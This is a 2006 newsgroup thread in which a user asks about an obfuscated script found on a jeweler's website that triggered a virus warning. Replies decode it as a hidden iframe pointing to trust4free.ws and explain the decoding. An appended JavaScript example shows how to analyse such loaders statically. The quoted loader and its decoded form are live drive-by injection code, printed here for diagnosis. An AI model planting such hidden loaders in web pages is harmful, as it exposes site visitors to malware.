malicious script?

 
 
Jack Mahon
      03-27-2006
Hello,

a friend visited a commercial jeweler's website and somehow got a virus
warning on her computer ("win32/worfo").

I checked out the site in question, but could find nothing on the home page
code except the last line in the source code, located after the body
end-tag.

The line is this:
<script>s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof(!xjeui>2!ifjhiu >2!tsd>(iuuq;00usvtu5gsff/xt0@je>joefy2?=0jgsbnf?#*<';o='';for(i=0;i<113;i ++){o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);</script>

I don't have a clue what this means. Can anyone help?

thanks,

Jack M


 
BootNic
      03-27-2006
> "Jack Mahon" <(E-Mail Removed)> wrote:
> news:viJVf.13061$%H.12433@clgrps13....
>
> Hello,
>
> a friend visited a commercial jeweler's website and somehow got a
> virus warning on her computer ("win32/worfo").
>
> I checked out the site in question, but could find nothing on the
> home page code except the last line in the source code, located
> after the body end-tag.
>
> The line is this:
> <script>s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof(!xjeui>2!ifjhiu >2!tsd>(iuuq;00usvtu5gsff/xt0@je>joefy2?=0jgsbnf?#*<';o='';for(i=0;i<113;i ++){o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);</script>
>
> I don't have a clue what this means. Can anyone help?



Looks like it adds a hidden iframe.

document.write("<iframe style='display:none' width=1 height=1 src='http://trust4free.ws/?id=index19'></iframe>");


--
BootNic Monday, March 27, 2006 12:51 AM

Have no fear of perfection - you'll never reach it.
*Salvador Dali*

 
gerg
      03-27-2006

> Looks like it adds a hidden iframe.
>
> document.write("<iframe style='display:none' width=1 height=1 src='http://trust4free.ws/?id=index19'></iframe>");
>
>

How in the world did you derive that? Not doubting your ability, but it
looked like total gibberish.

-g-

 
BootNic
      03-28-2006
> "gerg" <(E-Mail Removed)> wrote:
> news:(E-Mail Removed). ...
>
>>> <script>s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof(!xjeui>2!ifjhiu >2!tsd>(iuuq;00usvtu5gsff/xt0@je>joefy2?=0jgsbnf?#*<';o='';for(i=0;i<113;i ++){o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);</script>

>> Looks like it adds a hidden iframe.
>>
>> document.write("<iframe style='display:none' width=1 height=1
>> src='http://trust4free.ws/?id=index19'></iframe>");
>>
>>

> How in the world did you derive that? Not doubting your ability,
> but it looked like total gibberish.


Replace eval(o); with alert(o);

--
BootNic Monday, March 27, 2006 9:04 PM

"I've noticed that the press tends to be quite accurate, except when
they're writing on a subject I know something about."
*Keith F. Lynch*
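
The decode discussed in this thread (a string whose character codes are each shifted by one, rebuilt in a loop and passed to eval) can also be reversed without running any of the page's script. The following is an added example, not part of the original thread: it reads the literal and the offset out of the loader text, undoes the shift, and reports any hidden iframe in the result. The sample input is constructed and uses a placeholder host; shiftChars and analyzeLoader are names made up for this example.

```javascript
// Added example: decode a "shift each char code by N, then eval" loader statically.
// The sample is only treated as text; nothing is passed to eval() or document.write().

function shiftChars(text, delta) {
  return Array.from(text, c => String.fromCharCode(c.charCodeAt(0) + delta)).join('');
}

// Constructed sample, not the string from the thread; example.invalid is a placeholder host.
const PLAIN = "document.write(\"<iframe style='display:none' width=1 height=1 " +
              "src='http://example.invalid/?id=test'></iframe>\");";
const SAMPLE = "<script>s='" + shiftChars(PLAIN, 1) + "';o='';for(i=0;i<" + PLAIN.length +
               ";i++){o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);</script>";

function analyzeLoader(html) {
  const lit = /=\s*'([^']*)'/.exec(html);                             // encoded literal
  const op = /charCodeAt\(\s*\w+\s*\)\s*([+-])\s*(\d+)/.exec(html);   // per-character offset
  if (!lit || !op) return null;                                       // not this loader shape
  const delta = (op[1] === '-' ? -1 : 1) * Number(op[2]);
  const decoded = shiftChars(lit[1], delta);

  // A loop bound that differs from the literal's length suggests the copy being
  // analysed was altered after it left the page (for example by line wrapping).
  const bound = /<\s*(\d+)\s*;/.exec(html.slice(lit.index + lit[0].length));
  const lengthMatches = bound ? Number(bound[1]) === lit[1].length : null;

  const iframes = [];
  for (const m of decoded.matchAll(/<iframe\b([^>]*)>/gi)) {
    const attrs = m[1];
    const src = /\bsrc\s*=\s*['"]?([^'"\s>]+)/i.exec(attrs);
    const size = name => {
      const d = new RegExp('\\b' + name + '\\s*=\\s*[\'"]?(\\d+)', 'i').exec(attrs);
      return d ? Number(d[1]) : null;
    };
    const w = size('width'), h = size('height');
    // Hidden means styled invisible or sized to at most one pixel in either dimension.
    const hidden = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(attrs) ||
                   (w !== null && w <= 1) || (h !== null && h <= 1);
    iframes.push({ src: src ? src[1] : null, hidden });
  }
  return { delta, decoded, lengthMatches, iframes };
}

console.log(analyzeLoader(SAMPLE));
```

When checking a copy pasted from mail or a newsgroup, a false lengthMatches is a cue to re-fetch the page source before trusting the decoded text.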

 